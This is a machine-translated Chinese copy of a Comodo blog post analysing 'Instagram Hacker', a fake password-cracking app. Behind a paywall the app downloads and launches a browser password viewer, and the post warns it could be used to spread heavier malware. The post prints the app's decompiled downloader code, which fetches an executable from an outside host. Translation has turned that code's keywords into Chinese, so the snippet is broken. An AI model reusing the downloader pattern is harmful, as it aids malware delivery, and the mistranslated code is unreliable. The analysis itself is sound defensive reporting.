阅读时间: 4 分钟
许多人不会将潜在有害应用程序(PUA)视为严重危险。 这种鲁re的态度的原因是,PUA通常是在用户同意的情况下安装的。 但是这种意见是一个很大的错误。 不仅是因为PUA可以在逐个下载的基础上秘密安装其他程序,例如广告软件或间谍软件。 生动的例子 下面由Comodo Threat Research Labs分析 专家清楚地表明,PUA可能是更具威胁性的武器。
认识名为“ Instagram Hacker”的软件。 它有官方网站 https://hackinstagram.net/ 并承诺…入侵任何Instagram帐户。 除此之外,您可以免费下载并安装它。
安装后,它会提示您输入Instagram个人资料URL并破解密码。
结果在几秒钟内到来:
但是单击“查看密码”按钮后,会出现一个新窗口:
单击“获取激活码”按钮重定向到“购买页面”。
它提供购买“激活码”的功能,但是……您能闻到空气中的欺诈吗? 显然,不存在能够几秒钟破解Instagram密码的软件。 那么,Instagram Hacker只是另一个欺骗简单元素的欺骗工具吗? 最好的检查方法是查看应用程序代码。
该代码受Dotnet Reactor保护,但可以使用de4dot工具进行解码。
现在我们可以确定该应用程序是欺诈工具。 代码的第一个片段只是伪造了进度演示指示器。
但是另一个更有趣。 如您所见,如果激活成功,它包含一个URL,该URL带有可执行文件以供下载。
LoadingWindow()
{
Class2.qDiUy7EzyuIMj();
this.filename =“ view.exe”;
this.uri =新的Uri(“ http://software-logistics.net/external/component/download/view.exe”);
this.InitializeComponent();
如果(File.Exists(this.filename))
{
File.Delete(this.filename);
}
尝试
{
WebClient client1 = new WebClient();
client1.DownloadFileAsync(this.uri,this.filename);
client1.DownloadProgressChanged + =新的DownloadProgressChangedEventHandler(this.method_1);
client1.DownloadFileCompleted + =新的AsyncCompletedEventHandler(this.method_2);
}
捕捉
{
this.method_0();
}
}
}
}
如果运行可执行文件,我们将发现它是NirSoft的WebBrowserPassView应用程序:
https://www.nirsoft.net/utils/web_browser_password.html
WebBrowserPassView只是一个密码提取工具,它可以显示Web浏览器存储的密码。 因此,该软件可以提取的所有密码不是Instagram的,而是用户自己的密码保存在浏览器中!
让我们继续:Instagram黑客所做的就是从NirSoft下载并启动另一个PUA。 因此,我们显然面临着欺诈工具。 请注意此处的操纵性心理技巧:如果受害者发现自己受骗,则几乎不会向警方报告此事。 因为在那种情况下,她必须承认试图入侵Instagram,这是犯下网络犯罪的行为。
但这是边缘的薄弱环节。
最危险的威胁是,应用程序中的URL可以轻易在恶意程序上更改,而恶意文件将在受害者的计算机上执行。 因此,该PUA以及此类恶意软件类型的许多其他示例可以用于大量扩散各种“重”恶意软件,例如特洛伊木马,后门, 勒索 等等
这是将PUA视为真正危险的恶意软件的充分理由。 因为它可能成为大规模破坏性网络攻击的跳板。
“今天我们不应该考虑 恶意软件 是危险还是不太危险,” Comodo威胁研究实验室负责人Fatih Orhan说。 “任何 恶意软件 在孤立的空间中不存在。 如今,网络犯罪分子建立了很长的恶意软件链来攻击用户,并且,正如您所看到的,PUA可以成为这种查杀链中的链接。 所以我们应该称锹为锹。 是的,这些应用程序已下载并在获得用户批准的情况下运行,但在这种情况下,这种批准是通过欺诈手段来勒索的。 在整个可能不需要的应用程序中,它们假装都是合法的,每个人都需要了解它只是伪装。 因此,Comodo不仅提供高端技术保护,而且会定期通知用户以防止他们陷入网络空间的危险陷阱。”
Comodo安全地生活!
相关资源
维基百科DDOS攻击
恶意软件删除
网站恶意软件扫描程序
最佳网站安全
WordPress的安全
测试您的电子邮件安全性 免费获取即时安全评分 资料来源:https://blog.comodo.com/comodo-news/how-unwanted-applications-are-greater-security-threat/